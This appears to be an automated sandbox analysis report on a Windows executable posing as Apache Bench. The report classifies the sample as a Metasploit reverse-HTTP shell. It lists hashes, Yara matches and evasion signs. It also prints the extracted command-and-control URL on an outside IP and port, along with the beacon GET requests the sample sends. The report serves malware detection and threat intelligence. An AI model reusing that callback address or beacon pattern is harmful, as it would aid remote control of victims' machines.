Windows Analysis Report
DRVf7H9j4V.exe

Overview

General Information

Sample name: DRVf7H9j4V.exe (renamed because the original name is a hash value)
Original sample name: ef9e66020f10a61f05bc865b167248d5.exe
Analysis ID: 1520612
MD5: ef9e66020f10a61f05bc865b167248d5
SHA1: d17d15d3234e278a6110d1f23ea3369c5c68238c
SHA256: ec8e8680522e7ecb16043670512d860de1f5ee95b7c3cadb4b6612e92a21af77
Tags: exe, user-abuse_ch

Detection

Metasploit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Metasploit Payload
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

AV Detection

Source: DRVf7H9j4V.exe Avira: detected
Source: DRVf7H9j4V.exe Malware Configuration Extractor: Metasploit {"Type": "Shell Reverse Http", "URL": "http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF"}
Source: DRVf7H9j4V.exe ReversingLabs: Detection: 81%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: DRVf7H9j4V.exe Joe Sandbox ML: detected
Source: DRVf7H9j4V.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: C:\local0\asf\release\build-2.2.14\support\Release\ab.pdb source: DRVf7H9j4V.exe
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then xor edx, dword ptr [90909090h] 0_2_0040A430
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then push ebp 0_2_00401E39
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then sti 0_2_004056C0
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then enter FAFFh, 90h 0_2_004066E0
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then sti 0_2_004056F0
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then or dword ptr [ebx+104D8BECh], 8B08456Dh 0_2_00408680
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then xchg dword ptr [eax+21909081h], edx 0_2_004058A1
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then sti 0_2_004056B1
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then sti 0_2_0040566F
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then enter FAFFh, 90h 0_2_004067C3
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 4x nop then xchg dword ptr [eax+21909081h], edx 0_2_004059A4

Networking

Source: Malware configuration extractor URLs: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 63653 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 63654 -> 7700
Source: unknown Network traffic detected: HTTP traffic on port 63655 -> 7700
Source: global traffic TCP traffic: 192.168.2.8:49704 -> 89.197.154.115:7700
Source: Joe Sandbox View IP Address: 89.197.154.115
Source: Joe Sandbox View ASN Name: VIRTUAL1GB
Source: global traffic HTTP traffic detected (reported 10 times):
  GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
  Host: 89.197.154.115:7700
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 89.197.154.115 (reported 50 times)
Source: global traffic HTTP traffic detected (reported 10 times):
  GET /K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kqcT4DaURLYWyKMdkqDLkLGFtLfbxA06bzLkqpX3YMVK_WF-7csJS2nAg6pLu5gXYS3kF HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
  Host: 89.197.154.115:7700
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp, DRVf7H9j4V.exe, 00000000.00000002.2240362748.00000000007AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://89.197.154.115:7700/K3rEzPnv_aWkoqWjwlQ_UwwHmzOpx4EBdVmPOf94Dvz96UsIrkE72JilI5LCEjfwvnZxqT-kq
Source: DRVf7H9j4V.exe String found in binary or memory: http://www.apache.org/
Source: DRVf7H9j4V.exe String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: DRVf7H9j4V.exe String found in binary or memory: http://www.zeustech.net/

System Summary

Source: DRVf7H9j4V.exe, type: SAMPLE Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_0040162C 0_2_0040162C
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00690095 0_2_00690095
Source: DRVf7H9j4V.exe, 00000000.00000002.2240246457.0000000000415000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameab.exeF vs DRVf7H9j4V.exe
Source: DRVf7H9j4V.exe Binary or memory string: OriginalFilenameab.exeF vs DRVf7H9j4V.exe
Source: DRVf7H9j4V.exe, type: SAMPLE Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: DRVf7H9j4V.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: DRVf7H9j4V.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00401877 pushad ; retf 0_2_00401A79
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004070D9 push ebx; iretd 0_2_004070DD
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004012DB push FFFFFFCAh; ret 0_2_00401308
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00402779 push ebp; ret 0_2_0040277A
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00405123 push edi; retn 0010h 0_2_00405125
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00401527 push esi; ret 0_2_00401528
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004055C6 push edx; ret 0_2_004055C9
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004017D1 pushad ; retf 0_2_00401A79
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004079EC push eax; retf 0_2_004079ED
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00401DFC push 00401450h; iretd 0_2_00401E0A
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_00403F92 push ebp; ret 0_2_00403F9A
Source: C:\Users\user\Desktop\DRVf7H9j4V.exe Code function: 0_2_004017BC pushad ; retf 0_2_00401A79
Source: DRVf7H9j4V.exe Static PE information: section name: .text entropy: 7.017108244459124

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\DRVf7H9j4V.exe TID: 6108 Thread sleep time: -45000s >= -30000s
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.0000000000777000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%%,b
Source: DRVf7H9j4V.exe, 00000000.00000002.2240362748.000000000078D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW

Remote Access Functionality

Source: Yara match File source: DRVf7H9j4V.exe, type: SAMPLE
Source: Yara match File source: 0.0.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DRVf7H9j4V.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2240199625.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2240322277.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1451835611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY